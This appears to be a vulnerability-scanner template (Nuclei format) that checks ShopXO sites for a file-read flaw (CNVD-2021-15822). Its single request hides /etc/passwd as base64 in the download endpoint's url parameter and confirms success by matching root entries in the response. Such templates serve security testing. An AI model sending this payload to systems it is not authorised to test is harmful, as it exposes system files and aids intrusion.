id: CNVD-2021-15822
info:
  name: ShopXO Download File Read
  author: pikpikcu
  severity: high
  reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
  tags: shopxo,lfi
requests:
  - raw:
      - |
        GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
